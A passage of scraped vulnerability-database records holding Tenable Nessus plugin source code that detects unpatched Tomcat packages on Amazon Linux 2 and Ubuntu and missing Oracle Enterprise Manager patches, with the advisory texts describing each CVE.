"p-cpe:/a:amazon:linux:tomcat-docs-webapp", "p-cpe:/a:amazon:linux:tomcat-el-2.2-api", "p-cpe:/a:amazon:linux:tomcat-javadoc", "p-cpe:/a:amazon:linux:tomcat-jsp-2.2-api", "p-cpe:/a:amazon:linux:tomcat-jsvc", "p-cpe:/a:amazon:linux:tomcat-lib", "p-cpe:/a:amazon:linux:tomcat-servlet-3.0-api", "p-cpe:/a:amazon:linux:tomcat-webapps", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2020-1402.NASL", "href": "https://www.tenable.com/plugins/nessus/134569", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2020-1402.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134569);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/11\");\n\n script_cve_id(\n \"CVE-2018-1304\",\n \"CVE-2018-1305\",\n \"CVE-2018-8014\",\n \"CVE-2018-8034\",\n \"CVE-2020-1938\"\n );\n script_xref(name:\"ALAS\", value:\"2020-1402\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0021\");\n\n script_name(english:\"Amazon Linux 2 : tomcat (ALAS-2020-1402)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The host name verification when using TLS with the WebSocket client\nwas missing. It is now enabled by default. Versions Affected: Apache\nTomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and\n7.0.35 to 7.0.88. (CVE-2018-8034)\n\nThe URL pattern of '' (the empty string) which exactly maps to the\ncontext root was not correctly handled in Apache Tomcat 9.0.0.M1 to\n9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when\nused as part of a security constraint definition. This caused the\nconstraint to be ignored. It was, therefore, possible for unauthorised\nusers to gain access to web application resources that should have\nbeen protected. Only security constraints with a URL pattern of the\nempty string were affected. (CVE-2018-1304)\n\nSecurity constraints defined by annotations of Servlets in Apache\nTomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and\n7.0.0 to 7.0.84 were only applied once a Servlet had been loaded.\nBecause security constraints defined in this way apply to the URL\npattern and any URLs below that point, it was possible - depending on\nthe order Servlets were loaded - for some security constraints not to\nbe applied. This could have exposed resources to users who were not\nauthorised to access them. (CVE-2018-1305)\n\nThe defaults settings for the CORS filter provided in Apache Tomcat\n9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to\n7.0.88 are insecure and enable 'supportsCredentials' for all origins.\nIt is expected that users of the CORS filter will have configured it\nappropriately for their environment rather than using it in the\ndefault configuration. Therefore, it is expected that most users will\nnot be impacted by this issue. (CVE-2018-8014)\n\nWhen using the Apache JServ Protocol (AJP), care must be taken when\ntrusting incoming connections to Apache Tomcat. Tomcat treats AJP\nconnections as having higher trust than, for example, a similar HTTP\nconnection. If such connections are available to an attacker, they can\nbe exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1\nto 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with\nan AJP Connector enabled by default that listened on all configured IP\naddresses. It was expected (and recommended in the security guide)\nthat this Connector would be disabled if not required. This\nvulnerability report identified a mechanism that allowed: - returning\narbitrary files from anywhere in the web application - processing any\nfile in the web application as a JSP Further, if the web application\nallowed file upload and stored those files within the web application\n(or the attacker was able to control the content of the web\napplication by some other means) then this, along with the ability to\nprocess a file as a JSP, made remote code execution possible. It is\nimportant to note that mitigation is only required if an AJP port is\naccessible to untrusted users. Users wishing to take a\ndefence-in-depth approach and block the vector that permits returning\narbitrary files and execution as JSP may upgrade to Apache Tomcat\n9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to\nthe default AJP Connector configuration in 9.0.31 to harden the\ndefault configuration. It is likely that users upgrading to 9.0.31,\n8.5.51 or 7.0.100 or later will need to make small changes to their\nconfigurations. (CVE-2020-1938)\n\nAs part of our fix for this CVE, we are disabling Tomcat 2019 AJP\nconnector in the default configuration in alignment with the upstream\nchanges. This change will require customers who use the default Tomcat\nconfiguration (in which the AJP connector was previously enabled) to\nexplicitly re-enable the connector if they need it. Also take note\nthat a connector configured without an explicit address will only bind\nto the loopback address.\n\nExamples of output from netstat before and after updating tomcat8 and\ntomcat7 are below (note that it is the same on AL1 and AL2 with both\ntomcat7 and tomcat8).\n\nAL2 tomcat8.5 :\n\nbefore :\n\ntcp6 0 0 :::8009 :::* LISTEN 25772/java\n\ntcp6 0 0 :::8080 :::* LISTEN 25772/java\n\ntcp6 0 0 127.0.0.1:8005 :::* LISTEN 25772/java\n\nAfter :\n\ntcp6 0 0 :::8080 :::* LISTEN 25772/java\n\ntcp6 0 0 127.0.0.1:8005 :::* LISTEN 25772/java\n\nTo re-enable the AJP port in Tomcat, users can follow the steps \nbelow :\n\n1) For AL2 Core (tomcat7): Uncomment the following line in\n/etc/tomcat/server.xml and restart the service\n\n\n\n2) For AL2 Tomcat8.5 extra: Uncomment the following line in\n/etc/tomcat/server.xml and restart the service\n\n\n\nSee also :\n\nApache Tomcat release notes\n\nTomcat 7\n\n<a\nhref='http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_\n8.5.51'>Tomcat 8\n\nRedHat <a href='https://access.redhat.com/solutions/4851251'>solutions\");\n # http://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.100\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?177285c3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2020-1402.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update tomcat' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1938\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-admin-webapps-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-docs-webapp-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-el-2.2-api-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-javadoc-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-jsp-2.2-api-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-jsvc-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-lib-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-servlet-3.0-api-7.0.76-10.amzn2.0.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"tomcat-webapps-7.0.76-10.amzn2.0.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T17:04:28", "description": "The version of Oracle Enterprise Manager Cloud Control installed on the remote host is affected by multiple vulnerabilities in Enterprise Manager Base Platform component:\n\n - An unspecified vulnerability in the Enterprise Manager Base Platform component of Oracle Enterprise Manager Products Suite (subcomponent: Connector Framework (Apache CXF)), which could allow an unauthenticated, remote attacker to compromise Enterprise Manager Base Platform. (CVE-2018-8039)\n\n - An unspecified vulnerability in the Oracle Enterprise Manager Base Platform component of Oracle Enterprise Manager Products Suite (subcomponent: Valid Session (Apache ActiveMQ)), which could allow an unauthenticated, remote attacker to compromise Oracle Enterprise Manager Base Platform. (CVE-2019-0222)\n\n - An unspecified vulnerability in the Enterprise Manager Base Platform component of Oracle Enterprise Manager Products Suite (subcomponent: Discovery Framework (OpenSSL)), which could allow and unauthenticated, remote attacker to compromise Enterprise Manager Base Platform. (CVE-2019-1559)", "cvss3": {}, "published": "2019-07-17T00:00:00", "type": "nessus", "title": "Oracle Enterprise Manager Cloud Control (Jul 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11775", "CVE-2018-1258", "CVE-2018-8039", "CVE-2019-0222", "CVE-2019-1559"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:oracle:enterprise_manager"], "id": "ORACLE_ENTERPRISE_MANAGER_JUL_2019_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/126775", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(126775);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\n \"CVE-2018-1258\",\n \"CVE-2018-8039\",\n \"CVE-2018-11775\",\n \"CVE-2019-0222\",\n \"CVE-2019-1559\"\n );\n script_bugtraq_id(\n 104222,\n 105335,\n 106357,\n 107174,\n 107622\n );\n script_xref(name:\"IAVA\", value:\"2019-A-0251\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n\n script_name(english:\"Oracle Enterprise Manager Cloud Control (Jul 2019 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An enterprise management application installed on the remote host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Enterprise Manager Cloud Control installed on\nthe remote host is affected by multiple vulnerabilities in\nEnterprise Manager Base Platform component:\n\n - An unspecified vulnerability in the Enterprise Manager Base Platform component of\n Oracle Enterprise Manager Products Suite (subcomponent: Connector Framework (Apache CXF)),\n which could allow an unauthenticated, remote attacker to compromise\n Enterprise Manager Base Platform. (CVE-2018-8039)\n\n - An unspecified vulnerability in the Oracle Enterprise Manager Base Platform component\n of Oracle Enterprise Manager Products Suite (subcomponent: Valid Session (Apache ActiveMQ)),\n which could allow an unauthenticated, remote attacker to compromise\n Oracle Enterprise Manager Base Platform. (CVE-2019-0222)\n\n - An unspecified vulnerability in the Enterprise Manager Base Platform component of\n Oracle Enterprise Manager Products Suite (subcomponent: Discovery Framework (OpenSSL)), which\n could allow and unauthenticated, remote attacker to compromise\n Enterprise Manager Base Platform. (CVE-2019-1559)\");\n # https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9aa2b901\");\n # https://support.oracle.com/rs?type=doc&id=2534806.1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?88632d22\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2019\nOracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8039\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-1258\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:enterprise_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_enterprise_manager_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Enterprise Manager Cloud Control\");\n\n exit(0);\n}\n\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('oracle_rdbms_cpu_func.inc');\ninclude('install_func.inc');\n\nproduct = 'Oracle Enterprise Manager Cloud Control';\ninstall = get_single_install(app_name:product, exit_if_unknown_ver:TRUE);\nversion = install['version'];\nemchome = install['path'];\n\npatchid = NULL;\nmissing = NULL;\npatched = FALSE;\nfix = NULL;\n\nif (version =~ '^13\\\\.3\\\\.0\\\\.0(\\\\.[0-9]+)?$')\n{\n patchid = '29835547';\n fix = '13.3.0.0.190716';\n}\nelse if (version =~ '^13\\\\.2\\\\.0\\\\.0(\\\\.[0-9]+)?$')\n{\n patchid = '29835501';\n fix = '13.2.0.0.190716';\n}\nelse if (version =~ '^12\\\\.1\\\\.0\\\\.5(\\\\.[0-9]+)?$')\n{\n patchid = '29835388';\n fix = '12.1.0.5.190716';\n}\n\nif (isnull(patchid))\n audit(AUDIT_HOST_NOT, 'affected');\n\n# compare version to check if we've already adjusted for patch level during detection\nif (ver_compare(ver:version, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, product, version, emchome);\n\n# Now look for the affected components\npatchesinstalled = find_patches_in_ohomes(ohomes:make_list(emchome));\nif (isnull(patchesinstalled))\n missing = patchid;\nelse\n{\n foreach applied (keys(patchesinstalled[emchome]))\n {\n if (applied == patchid)\n {\n patched = TRUE;\n break;\n }\n else\n {\n foreach bugid (patchesinstalled[emchome][applied]['bugs'])\n {\n if (bugid == patchid)\n {\n patched = TRUE;\n break;\n }\n }\n if (patched) break;\n }\n }\n if (!patched)\n missing = patchid;\n}\n\nif (empty_or_null(missing))\n audit(AUDIT_HOST_NOT, 'affected');\n\norder = make_list('Product', 'Version', 'Missing patch');\nreport = make_array(\n order[0], product,\n order[1], version,\n order[2], patchid\n);\nreport = report_items_str(report_items:report, ordered_fields:order);\n\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T15:39:40", "description": "It was discovered that Tomcat incorrectly handled being configured with HTTP PUTs enabled. A remote attacker could use this issue to upload a JSP file to the server and execute arbitrary code. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 17.10.\n(CVE-2017-12616, CVE-2017-12617)\n\nIt was discovered that Tomcat contained incorrect documentation regarding description of the search algorithm used by the CGI Servlet to identify which script to execute. This issue only affected Ubuntu 17.10. (CVE-2017-15706)\n\nIt was discovered that Tomcat incorrectly handled en empty string URL pattern in security constraint definitions. A remote attacker could possibly use this issue to gain access to web application resources, contrary to expectations. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 17.10. (CVE-2018-1304)\n\nIt was discovered that Tomcat incorrectly handled applying certain security constraints. A remote attacker could possibly access certain resources, contrary to expectations. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 17.10. (CVE-2018-1305)\n\nIt was discovered that the Tomcat CORS filter default settings were insecure and would enable 'supportsCredentials' for all origins, contrary to expectations. (CVE-2018-8014).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-05-31T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 18.04 LTS : Tomcat vulnerabilities (USN-3665-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12616", "CVE-2017-12617", "CVE-2017-15706", "CVE-2018-1304", "CVE-2018-1305", "CVE-2018-8014"], "modified": "2023-10-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libtomcat7-java", "p-cpe:/a:canonical:ubuntu_linux:libtomcat8-embed-java", "p-cpe:/a:canonical:ubuntu_linux:libtomcat8-java", "p-cpe:/a:canonical:ubuntu_linux:tomcat7", "p-cpe:/a:canonical:ubuntu_linux:tomcat7-admin", "p-cpe:/a:canonical:ubuntu_linux:tomcat7-common", "p-cpe:/a:canonical:ubuntu_linux:tomcat7-examples", "p-cpe:/a:canonical:ubuntu_linux:tomcat7-user", "p-cpe:/a:canonical:ubuntu_linux:tomcat8", "p-cpe:/a:canonical:ubuntu_linux:tomcat8-admin", "p-cpe:/a:canonical:ubuntu_linux:tomcat8-common", "p-cpe:/a:canonical:ubuntu_linux:tomcat8-examples", "p-cpe:/a:canonical:ubuntu_linux:tomcat8-user", "cpe:/o:canonical:ubuntu_linux:14.04:-:lts", "cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:libservlet3.0-java", "p-cpe:/a:canonical:ubuntu_linux:libservlet3.1-java"], "id": "UBUNTU_USN-3665-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110264", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3665-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110264);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\n \"CVE-2017-12616\",\n \"CVE-2017-12617\",\n \"CVE-2017-15706\",\n \"CVE-2018-1304\",\n \"CVE-2018-1305\",\n \"CVE-2018-8014\"\n );\n script_xref(name:\"USN\", value:\"3665-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 18.04 LTS : Tomcat vulnerabilities (USN-3665-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was discovered that Tomcat incorrectly handled being configured\nwith HTTP PUTs enabled. A remote attacker could use this issue to\nupload a JSP file to the server and execute arbitrary code. This issue\nonly affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 17.10.\n(CVE-2017-12616, CVE-2017-12617)\n\nIt was discovered that Tomcat contained incorrect documentation\nregarding description of the search algorithm used by the CGI Servlet\nto identify which script to execute. This issue only affected Ubuntu\n17.10. (CVE-2017-15706)\n\nIt was discovered that Tomcat incorrectly handled en empty string URL\npattern in security constraint definitions. A remote attacker could\npossibly use this issue to gain access to web application resources,\ncontrary to expectations. This issue only affected Ubuntu 14.04 LTS,\nUbuntu 16.04 LTS and Ubuntu 17.10. (CVE-2018-1304)\n\nIt was discovered that Tomcat incorrectly handled applying certain\nsecurity constraints. A remote attacker could possibly access certain\nresources, contrary to expectations. This issue only affected Ubuntu\n14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 17.10. (CVE-2018-1305)\n\nIt was discovered that the Tomcat CORS filter default settings were\ninsecure and would enable 'supportsCredentials' for all origins,\ncontrary to expectations. (CVE-2018-8014).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-3665-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat VirtualDirContext Class File Handling Remote JSP Source Code Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtomcat7-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtomcat8-embed-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtomcat8-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat7-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat7-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat7-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat7-user\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat8-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat8-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat8-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tomcat8-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libservlet3.0-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libservlet3.1-java\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2023 Canonical, Inc. / NASL script (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('14.04' >< os_release || '16.04' >< os_release || '18.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 14.04 / 16.04 / 18.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '14.04', 'pkgname': 'libservlet3.0-java', 'pkgver': '7.0.52-1ubuntu0.14'},\n {'osver': '14.04', 'pkgname': 'libtomcat7-java', 'pkgver': '7.0.52-1ubuntu0.14'},\n {'osver': '14.04', 'pkgname': 'tomcat7', 'pkgver': '7.0.52-1ubuntu0.14'},\n {'osver': '14.04', 'pkgname': 'tomcat7-admin', 'pkgver': '7.0.52-1ubuntu0.14'},\n {'osver': '14.04', 'pkgname': 'tomcat7-common', 'pkgver': '7.0.52-1ubuntu0.14'},\n {'osver': '14.04', 'pkgname': 'tomcat7-examples', 'pkgver': '7.0.52-1ubuntu0.14'},\n {'osver': '14.04', 'pkgname': 'tomcat7-user', 'pkgver': '7.0.52-1ubuntu0.14'},\n 